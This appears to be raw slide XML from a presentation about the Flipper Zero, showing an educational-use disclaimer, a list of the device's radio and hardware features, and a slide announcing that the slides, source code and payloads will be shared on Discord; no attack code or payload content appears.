              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Disclaimer!</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257875" y="1983150"/>
            <a:ext cx="8520600" cy="1046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500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Everything presented today is for educational purposes!We do not condone or encourage the use of any information in this presentation for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>purposes.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Google Shape;65;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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ADADAD"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="ADADAD"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Features</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="ADADAD"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;23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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>125KHz RFID</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Infrared</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Bluetooth</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>iButton</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>So many more with GPIO</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Google Shape;231;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="232" name="Google Shape;232;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16324" l="20384" r="26503" t="25888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5451799" y="1887838"/>
            <a:ext cx="2406501" cy="1367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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1105725"/>
            <a:ext cx="8520600" cy="3256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000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Presentation Slides and Notes</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Wiring Diagrams</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Source Code</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Artifacts</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Freeware Used</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Available in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="7289DA"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>#free-learning Discord Channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>March 15th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;23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8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Presentation Care Package</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019250" y="1105725"/>
            <a:ext cx="2945275" cy="2945275"/>
            <a:chOff x="5524200" y="1329888"/>
            <a:chExt cx="2945275" cy="2945275"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="240" name="Google Shape;240;p33"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5524200" y="1329888"/>
              <a:ext cx="2945275" cy="2945275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="241" name="Google Shape;241;p33"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6075675" y="2089150"/>
              <a:ext cx="648000" cy="1150500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="242" name="Google Shape;242;p33"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6518625" y="2208150"/>
              <a:ext cx="204900" cy="1018200"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="243" name="Google Shape;243;p33"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6723450" y="2346975"/>
              <a:ext cx="284400" cy="879300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="244" name="Google Shape;244;p33"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6730000" y="2532100"/>
              <a:ext cx="780300" cy="681000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="245" name="Google Shape;245;p33"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6723525" y="2697375"/>
              <a:ext cx="1216500" cy="528900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="Google Shape;246;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2668950" y="1758750"/>
            <a:ext cx="3806100" cy="81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4000">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
